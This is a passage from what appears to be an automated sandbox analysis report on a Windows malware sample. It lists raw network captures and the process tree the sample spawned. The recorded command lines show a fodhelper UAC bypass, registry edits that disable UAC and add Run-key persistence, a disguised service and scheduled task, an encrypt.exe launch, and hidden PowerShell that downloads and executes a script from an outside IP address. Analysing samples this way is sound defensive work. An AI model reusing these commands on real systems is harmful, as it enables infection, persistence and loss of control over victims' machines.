                                                                                                          2022-08-13 07:07:16 UTC156OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:07:16 UTC156OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 34 32 30 66 39 31 38 35 32 38 36 37 34 38 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: f420f91852867486<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:07:16 UTC157OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 34 32 30 66 39 31 38 35 32 38 36 37 34 38 36 0d 0a 0d 0a
                                                                                                          Data Ascii: BND 3 CON\QOS 29Context: f420f91852867486
                                                                                                          2022-08-13 07:07:16 UTC157INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:07:16 UTC157INData Raw: 4d 53 2d 43 56 3a 20 4a 6a 79 34 71 77 78 45 49 55 71 76 31 64 34 6c 6c 32 34 6e 39 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: Jjy4qwxEIUqv1d4ll24n9w.0Payload parsing failed.


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:09:06:31
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Users\user\Desktop\jxatBamQnK.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\Desktop\jxatBamQnK.exe"
                                                                                                          Imagebase:0x12a0000
                                                                                                          File size:1699840 bytes
                                                                                                          MD5 hash:C44C67FBBD78AF44E4E75787E636E1FE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000000.00000003.386967956.000000C000120000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000000.00000003.387736595.000000C000056000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000000.00000003.386987758.000000C000112000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                          Reputation:low

                                                                                                          General

                                                                                                          Target ID:1
                                                                                                          Start time:09:06:33
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd.exe /C fodhelper.exe
                                                                                                          Imagebase:0x7ff6a6590000
                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:09:06:34
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:3
                                                                                                          Start time:09:06:34
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\fodhelper.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:fodhelper.exe
                                                                                                          Imagebase:0x7ff788a60000
                                                                                                          File size:46080 bytes
                                                                                                          MD5 hash:1D1F9E564472A9698F1BE3F9FEB9864B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate

                                                                                                          General

                                                                                                          Target ID:4
                                                                                                          Start time:09:06:36
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                          Imagebase:0x7ff672ea0000
                                                                                                          File size:72704 bytes
                                                                                                          MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:09:06:36
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:9
                                                                                                          Start time:09:06:43
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")"
                                                                                                          Imagebase:0x7ff7fc170000
                                                                                                          File size:226816 bytes
                                                                                                          MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:10
                                                                                                          Start time:09:06:44
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:schtasks /run /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456
                                                                                                          Imagebase:0x7ff7fc170000
                                                                                                          File size:226816 bytes
                                                                                                          MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:11
                                                                                                          Start time:09:06:44
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:12
                                                                                                          Start time:09:06:44
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:sc create msupdate binpath= C:\Windows\Temp\C:\Windows\Temp\daemon.exe
                                                                                                          Imagebase:0x7ff6b2940000
                                                                                                          File size:69120 bytes
                                                                                                          MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:13
                                                                                                          Start time:09:06:46
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:14
                                                                                                          Start time:09:06:47
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:15
                                                                                                          Start time:09:06:49
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:sc description msupdate "Just For Test"
                                                                                                          Imagebase:0x7ff6b2940000
                                                                                                          File size:69120 bytes
                                                                                                          MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:16
                                                                                                          Start time:09:06:49
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\"http://212.87.212.218/doanlowd.txt\")
                                                                                                          Imagebase:0x7ff612400000
                                                                                                          File size:447488 bytes
                                                                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET

                                                                                                          General

                                                                                                          Target ID:17
                                                                                                          Start time:09:06:50
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:sc config msupdate start= auto
                                                                                                          Imagebase:0x7ff6b2940000
                                                                                                          File size:69120 bytes
                                                                                                          MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:18
                                                                                                          Start time:09:06:50
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:19
                                                                                                          Start time:09:06:50
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:20
                                                                                                          Start time:09:06:50
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:21
                                                                                                          Start time:09:06:50
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:net start msupdate
                                                                                                          Imagebase:0x7ff79dd20000
                                                                                                          File size:56832 bytes
                                                                                                          MD5 hash:15534275EDAABC58159DD0F8607A71E5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:22
                                                                                                          Start time:09:06:51
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f
                                                                                                          Imagebase:0x7ff672ea0000
                                                                                                          File size:72704 bytes
                                                                                                          MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:23
                                                                                                          Start time:09:06:51
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:24
                                                                                                          Start time:09:06:52
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f
                                                                                                          Imagebase:0x7ff672ea0000
                                                                                                          File size:72704 bytes
                                                                                                          MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:25
                                                                                                          Start time:09:06:52
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:26
                                                                                                          Start time:09:06:52
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.bat" "
                                                                                                          Imagebase:0x7ff6a6590000
                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:27
                                                                                                          Start time:09:06:52
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\net1 start msupdate
                                                                                                          Imagebase:0x7ff7aab90000
                                                                                                          File size:175104 bytes
                                                                                                          MD5 hash:AF569DE92AB6C1B9C681AF1E799F9983
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:28
                                                                                                          Start time:09:06:52
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f
                                                                                                          Imagebase:0x7ff672ea0000
                                                                                                          File size:72704 bytes
                                                                                                          MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:29
                                                                                                          Start time:09:06:52
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:30
                                                                                                          Start time:09:06:53
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:31
                                                                                                          Start time:09:06:53
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:32
                                                                                                          Start time:09:06:54
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')
                                                                                                          Imagebase:0x7ff612400000
                                                                                                          File size:447488 bytes
                                                                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET

                                                                                                          General

                                                                                                          Target ID:33
                                                                                                          Start time:09:06:55
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wmic process get executablepath
                                                                                                          Imagebase:0x7ff7110a0000
                                                                                                          File size:521728 bytes
                                                                                                          MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:34
                                                                                                          Start time:09:06:56
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:35
                                                                                                          Start time:09:07:00
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\daemon.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Temp\daemon.exe
                                                                                                          Imagebase:0xaa0000
                                                                                                          File size:1699840 bytes
                                                                                                          MD5 hash:C44C67FBBD78AF44E4E75787E636E1FE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.440719623.000000C00009E000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000023.00000003.439742062.000000C00018A000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 58%, ReversingLabs

                                                                                                          General

                                                                                                          Target ID:36
                                                                                                          Start time:09:07:01
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:findstr encrypt.exe
                                                                                                          Imagebase:0x7ff60fad0000
                                                                                                          File size:34304 bytes
                                                                                                          MD5 hash:BCC8F29B929DABF5489C9BE6587FF66D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:37
                                                                                                          Start time:09:07:01
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:38
                                                                                                          Start time:09:07:02
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\encrypt.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Temp\encrypt.exe
                                                                                                          Imagebase:0xbe0000
                                                                                                          File size:1996800 bytes
                                                                                                          MD5 hash:9996CC802C43F6FFE4065A514585C209
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 21%, Metadefender, Browse
                                                                                                          • Detection: 50%, ReversingLabs

                                                                                                          General

                                                                                                          Target ID:39
                                                                                                          Start time:09:07:06
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\daemon.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\Temp\daemon.exe"
                                                                                                          Imagebase:0xaa0000
                                                                                                          File size:1699840 bytes
                                                                                                          MD5 hash:C44C67FBBD78AF44E4E75787E636E1FE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000027.00000002.415175472.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Author: Florian Roth
                                                                                                          • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000027.00000002.415175472.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Author: Florian Roth

                                                                                                          General

                                                                                                          Target ID:40
                                                                                                          Start time:09:07:07
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wmic process get executablepath
                                                                                                          Imagebase:0x7ff7110a0000
                                                                                                          File size:521728 bytes
                                                                                                          MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:42
                                                                                                          Start time:09:07:08
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:44
                                                                                                          Start time:09:07:10
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                          Imagebase:0x7ff7e8070000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:45
                                                                                                          Start time:09:07:14
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\findstr.exe
